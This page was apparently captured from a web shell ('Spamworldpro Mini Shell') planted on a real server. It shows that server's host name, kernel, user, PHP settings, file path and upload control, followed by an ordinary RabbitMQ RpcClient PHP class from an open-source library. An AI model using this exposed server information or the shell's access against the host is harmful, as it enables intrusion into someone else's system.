Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/mautic.corals.io/vendor/php-amqplib/rabbitmq-bundle/RabbitMq/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/mautic.corals.io/vendor/php-amqplib/rabbitmq-bundle/RabbitMq/RpcClient.php
<?php

namespace OldSound\RabbitMqBundle\RabbitMq;

use PhpAmqpLib\Message\AMQPMessage;

class RpcClient extends BaseAmqp
{
    protected $requests = 0;
    protected $replies = [];
    protected $expectSerializedResponse;
    protected $timeout = 0;
    protected $notifyCallback;

    private $queueName;
    private $unserializer = 'unserialize';
    private $directReplyTo;
    private $directConsumerTag;

    public function initClient($expectSerializedResponse = true)
    {
        $this->expectSerializedResponse = $expectSerializedResponse;
    }

    public function addRequest($msgBody, $server, $requestId = null, $routingKey = '', $expiration = 0)
    {
        if (empty($requestId)) {
            throw new \InvalidArgumentException('You must provide a $requestId');
        }

        if (0 == $this->requests) {
            // On first addRequest() call, clear all replies
            $this->replies = [];

            if ($this->directReplyTo) {
                // On direct reply-to mode, make initial consume call
                $this->directConsumerTag = $this->getChannel()->basic_consume('amq.rabbitmq.reply-to', '', false, true, false, false, [$this, 'processMessage']);
            }
        }

        $msg = new AMQPMessage($msgBody, ['content_type' => 'text/plain',
                                               'reply_to' => $this->directReplyTo
                                                   ? 'amq.rabbitmq.reply-to' // On direct reply-to mode, use predefined queue name
                                                   : $this->getQueueName(),
                                               'delivery_mode' => 1, // non durable
                                               'expiration' => $expiration * 1000,
                                               'correlation_id' => $requestId, ]);

        $this->getChannel()->basic_publish($msg, $server, $routingKey);

        $this->requests++;

        if ($expiration > $this->timeout) {
            $this->timeout = $expiration;
        }
    }

    public function getReplies()
    {
        if ($this->directReplyTo) {
            $consumer_tag = $this->directConsumerTag;
        } else {
            $consumer_tag = $this->getChannel()->basic_consume($this->getQueueName(), '', false, true, false, false, [$this, 'processMessage']);
        }

        try {
            while (count($this->replies) < $this->requests) {
                $this->getChannel()->wait(null, false, $this->timeout);
            }
        } finally {
            $this->getChannel()->basic_cancel($consumer_tag);
        }

        $this->directConsumerTag = null;
        $this->requests = 0;
        $this->timeout = 0;

        return $this->replies;
    }

    public function processMessage(AMQPMessage $msg)
    {
        $messageBody = $msg->body;
        if ($this->expectSerializedResponse) {
            $messageBody = call_user_func($this->unserializer, $messageBody);
        }
        if ($this->notifyCallback !== null) {
            call_user_func($this->notifyCallback, $messageBody);
        }

        $this->replies[$msg->get('correlation_id')] = $messageBody;
    }

    protected function getQueueName()
    {
        if (null === $this->queueName) {
            [$this->queueName, , ] = $this->getChannel()->queue_declare("", false, false, true, false);
        }

        return $this->queueName;
    }

    public function setUnserializer($unserializer)
    {
        $this->unserializer = $unserializer;
    }

    public function notify($callback)
    {
        if (is_callable($callback)) {
            $this->notifyCallback = $callback;
        } else {
            throw new \InvalidArgumentException('First parameter expects to be callable');
        }
    }

    public function setDirectReplyTo($directReplyTo)
    {
        $this->directReplyTo = $directReplyTo;
    }

    public function reset()
    {
        $this->replies = [];
        $this->requests = 0;
    }
}

Spamworldpro Mini